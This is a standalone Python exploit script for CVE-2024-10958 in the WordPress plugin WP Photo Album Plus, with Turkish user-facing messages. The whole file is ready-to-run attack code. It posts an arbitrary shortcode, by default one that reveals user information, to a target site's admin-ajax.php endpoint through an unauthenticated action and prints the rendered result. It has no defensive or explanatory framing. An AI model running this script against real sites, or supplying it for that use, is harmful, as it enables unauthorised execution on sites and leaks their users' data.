exploit.py

#!/usr/bin/env python3

import requests
import argparse
import sys

banner = """
WordPress WP Photo Album Plus
Arbitrary Shortcode Execution
CVE-2024-10958
"""

def parse_args():
    parser = argparse.ArgumentParser(description='WP Photo Album Plus Exploit')
    parser.add_argument('-u', '--url', required=True, help='Hedef URL (örn: http://example.com)')
    parser.add_argument('-s', '--shortcode', default='[user_info]', help='Çalıştırılacak shortcode')
    return parser.parse_args()

def exploit_wppa_shortcode(target_url, shortcode):
    print(f"[*] Hedef: {target_url}")
    print(f"[*] Shortcode: {shortcode}")
    
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    
    payload = {
        'action': 'getshortcodedrenderedfenodelay',
        'shortcode': shortcode
    }
    
    try:
        response = requests.post(endpoint, data=payload)
        if response.status_code == 200:
            print("[+] Exploit başarılı!")
            print("[+] Yanıt:", response.text)
            return True
        else:
            print("[-] Exploit başarısız!")
            return False
            
    except Exception as e:
        print(f"[-] Hata: {str(e)}")
        return False

def main():
    print(banner)
    args = parse_args()
    exploit_wppa_shortcode(args.url, args.shortcode)

if __name__ == '__main__':
    main()